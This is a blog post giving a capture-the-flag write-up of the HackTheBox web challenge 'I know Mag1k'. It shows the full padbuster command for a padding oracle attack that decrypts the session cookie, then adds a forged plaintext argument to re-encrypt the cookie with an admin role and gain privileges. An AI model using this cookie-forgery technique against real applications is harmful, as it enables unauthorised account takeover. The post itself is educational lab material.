ads slot

    Latest Posts:

    / / / / / / / / [Hackthebox] Web challenge - I know Mag1k

    [Hackthebox] Web challenge - I know Mag1k

    , , , , , , Edit
    Hi guys,today we will do the web challenge - i know mag1k on hackthebox.eu,your task at this challenge is get profile page of the admin ,let's see your site first.


    At usual the site require a credential,go to it's source code page to find some info,i couldn't find any thing that helpful so i will do another methods,i tried SQLi with many payloads but i may not affected by SQLi,brute force for password ? i think it wouldn't a good idea because if we can brute force to find password of the admin that so easy challenge,but this isn't.Back give a look to the site,it have register page,i forward to it and register a new account,login with my account,after logging in you will see the page like this.


    I know if we browsing with browser it won't give us more information,i switch to do all request with burpsuite.In burpsuite when i forward to USER PROFILE i see some thing in cookie like this.


    At this step,i thought out a method that useful for this,it's padding oracle,if you don't know about it you can google for more information,so then what i will do ? i will decrypt that cookie's value by using padbuster tool.First i will try with this command.
    padbuster http://docker.hackthebox.eu:57328/profile.php E6blejRadpcKI%2Fmk%2FQm9mscBH3BNY%2F4s9qqFAyZJqVJqRAtmdzVSZ7irqr1elr7VjihMjCA%2BaIc%3D 8 --cookies iknowmag1k=E6blejRadpcKI%2Fmk%2FQm9mscBH3BNY%2F4s9qqFAyZJqVJqRAtmdzVSZ7irqr1elr7VjihMjCA%2BaIc%3D --encoding 0 --auth username:password
    Explain my command:
    • http://docker.hackthebox.eu:57328/profile.php == profile url.
    • E6blejRadpcKI%2Fmk%2FQm9mscBH3BNY%2F4s9qqFAyZJqVJqRAtmdzVSZ7irqr1elr7VjihMjCA%2BaIc%3D == EncryptedSample.
    • 8 == Block size to decrypt.
    • --cookies == specify the cookie which you want to decrypt.
    • --encoding == use encoding format 0 == base64.
    • --auth == for authenticate.


    The result after decrypted cookie's value like above,you can see i stand in at user role and your task is view the page of the admin,so i will change my role to admin,to do that let's use the previous command and append to it this argument
    -plaintext '{"user":"michael","role":"admin"}'
    when you use that argument the tool will change value and encrypt it,let's wait the result.


    Now we will send request with new cookie's value.


    You can see after request with new cookie's value we will get the flag.Thanks for reading !!!
    Share on Google Plus

    About Unkn0wn

    Captain running team to research about hacking,network,security and cyber field
      Blogger Comment
      Facebook Comment

    0 comments:

    Post a Comment

    Subscribe to: Post Comments ( Atom )